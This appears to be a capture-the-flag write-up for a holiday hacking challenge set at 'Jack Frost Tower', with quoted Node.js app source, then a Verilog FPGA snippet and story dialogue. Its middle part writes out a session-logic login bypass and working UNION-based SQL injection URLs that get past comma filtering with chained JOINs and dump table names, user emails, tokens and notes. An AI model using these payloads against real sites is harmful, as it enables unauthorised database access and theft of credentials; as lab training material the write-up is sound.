    var yr = date.getFullYear();
    var current_hour = date.getHours();
    var date_created = dateFormat(date, "yyyy-mm-dd hh:MM:ss");

    tempCont.query("SELECT * from uniquecontact where email="+tempCont.escape(email), function(error, rows, fields){

        if (error) {
            console.log(error);
            return res.sendStatus(500);
        }

        var rowlength = rows.length;
        if (rowlength >= "1"){
            session = req.session;
            session.uniqueID = email;
            req.flash('info', 'Email Already Exists');
            res.redirect("/contact");

        } else {

            tempCont.query("INSERT INTO uniquecontact (full_name, email, phone, country, date_created) VALUE (?, ?, ?, ?, ?)", [fullname, email, phone, country, date_created], function(error, rows, fields) {

                if (error) {
                    console.log(error);
                    return res.sendStatus(500);
                }

                res.render('email/e_template_1', { name: fullname }, function (err, data) {

                    // setup email data with unicode symbols
                    var mailOptions = {
                        from: 'Admin <admin@localhost>',
                        to: email,
                        subject: 'Thank you for contacting us!',
                        html: data
                    };

                    //  // send mail with defined transport object
                    //  transporter.sendMail(mailOptions, (error, info) => {
                    //      if (error) {
                    //          return console.log(error);
                    //      }
                    //      console.log('Message sent: %s', info.messageId);
                    //  });

                    session = req.session;
                    req.flash('info', 'Data Saved to Database!');
                    res.redirect("/contact");

                });

            });

        }

    });
});

## login page
app.post('/login', function(req, res, next){

    session = req.session;

    var username = req.body.username;
    var password = req.body.password;

    tempCont.query("SELECT * from users where email="+tempCont.escape(username), function(error, rows, fields){

        if (error) {
            return res.sendStatus(500);
        }

        var rowlength = rows.length;

        if (rowlength >= "1"){

            rows.forEach(function(item){

                var q = bcrypt.compareSync(password, item.password);

                if (q == true){
                    session.uniqueID = req.body.username;
                    session.userfullname = rows['0']['name'];
                    session.userstatus = rows['0']['user_status'];
                    res.redirect('/redirect');
                }else{
                    res.redirect('/redirect');
                }

            });

        }else{
            req.session.destroy(function(){
                res.redirect('/redirect');
            });
        }

    });
});

## logic bug here... gave us access to login

app.get('/redirect', function(req, res){
    session = req.session;

    if (session.uniqueID){
        res.redirect('/dashboard');
    } else {
        req.flash('info', 'Invalid Username or Password');
        res.redirect('/login');
    }
});

into https://staging.jackfrosttower.com/detail/

first SQLi because it would split on `,` so strategic cross joins with selects

https://staging.jackfrosttower.com/detail/1,

2 UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT name as full_name FROM users)UT2 JOIN (SELECT user_status from users)UT3 JOIN (SELECT id as country from users)UT4 JOIN (select email as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id--

encoded:
https://staging.jackfrosttower.com/detail/1,2%20UNION%20SELECT%20*%20FROM%20(SELECT%20id%20FROM%20users)UT1%20JOIN%20(SELECT%20name%20as%20full_name%20FROM%20users)UT2%20JOIN%20(SELECT%20user_status%20from%20users)UT3%20JOIN%20(SELECT%20id%20as%20country%20from%20users)UT4%20JOIN%20(select%20email%20as%20phone%20from%20users)UT5%20JOIN%20(select%20date_created%20from%20users)UT6%20JOIN%20(select%20now()%20as%20date_update%20from%20users)UT7%20ON%20id--
notes from the code:

    if (session.uniqueID){

        try {
            if (reqparam.indexOf(',') > 0){
                var ids = reqparam.split(',');
                reqparam = "0";
                for (var i=0; i<ids.length; i++){
                    query += tempCont.escape(m.raw(ids[i]));
                    query += " OR id="
                }
                // cant use "," so what can we do?
// https://staging.jackfrosttower.com/detail/1,2%20UNION%20SELECT%20*%20FROM%20users--
// https://staging.jackfrosttower.com/detail/1,2%20UNION%20SELECT%20*%20FROM%20users%20where%20token=null--
                query += "?";
            }else{
                query = "SELECT * FROM uniquecontact WHERE id=?"
            }
        } catch (error) {
            console.log(error);
            return res.sendStatus(500);

lots n lots of selects….

‘get admin’

UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT name as full_name FROM users)UT2 JOIN (SELECT user_status from users)UT3 JOIN (SELECT id as country from users)UT4 JOIN (select email as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id--

‘get all the table names’

https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT table_name as full_name FROM information_schema.tables where table_schema = 'encontact')UT2 JOIN (SELECT email from users)UT3 JOIN (SELECT token as country from users)UT4 JOIN (select user_status as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id LIMIT 10--

https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM users)UT1 JOIN (SELECT column_name as full_name FROM information_schema.columns where table_name = 'todo')UT2 JOIN (SELECT email from users)UT3 JOIN (SELECT token as country from users)UT4 JOIN (select user_status as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id LIMIT 10--

final answer

'santa doesnt want to be a clerk!'
https://staging.jackfrosttower.com/detail/1,2 UNION SELECT * FROM (SELECT id FROM todo)UT1 JOIN (SELECT note as full_name FROM todo where id =9)UT2 JOIN (SELECT note as email from todo)UT3 JOIN (SELECT note as country from todo)UT4 JOIN (select user_status as phone from users)UT5 JOIN (select date_created from users)UT6 JOIN (select now() as date_update from users)UT7 ON id LIMIT 10--


Here is all the dialogue

Buy up land all around Santa's Castle
Build bigger and more majestic tower next to Santa's
Erode Santa's influence at the North Pole via FrostFest, the greatest Con in history
Dishearten Santa's elves and encourage defection to our cause
Steal Santa's sleigh technology and build a competing and way better Frosty present delivery vehicle
Undermine Santa's ability to deliver presents on 12/24 through elf staff shortages, technology glitches, and assorted mayhem
Force Santa to cancel Christmas
SAVE THE DAY by delivering Frosty presents using merch from the Frost Tower Gift Shop to children world-wide... so the whole world sees that Frost saved the Holiday Season!!!! Bwahahahahaha!
With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him



Challenge: FGPA


localparam CLOCK_FREQ = 125000000;
integer counter = 0;
reg sq_wave_reg = 0;
assign wave_out = sq_wave_reg;
    
always @(posedge clk) begin
    if (rst) begin
        counter <= 32'h00;
        sq_wave_reg	 <= 1'b0;
    end

    else begin 
        
        // If counter is zero, toggle sq_wave_reg 
        if (counter == 32'h00) begin
            sq_wave_reg <= ~sq_wave_reg;
            
            // generate variable frequency
            counter <= CLOCK_FREQ / (2 * (freq / 100)) - 1;
        end 
        
        // Else count down
        else 
            counter <= counter - 1; 
        end
    end

thanks for reading….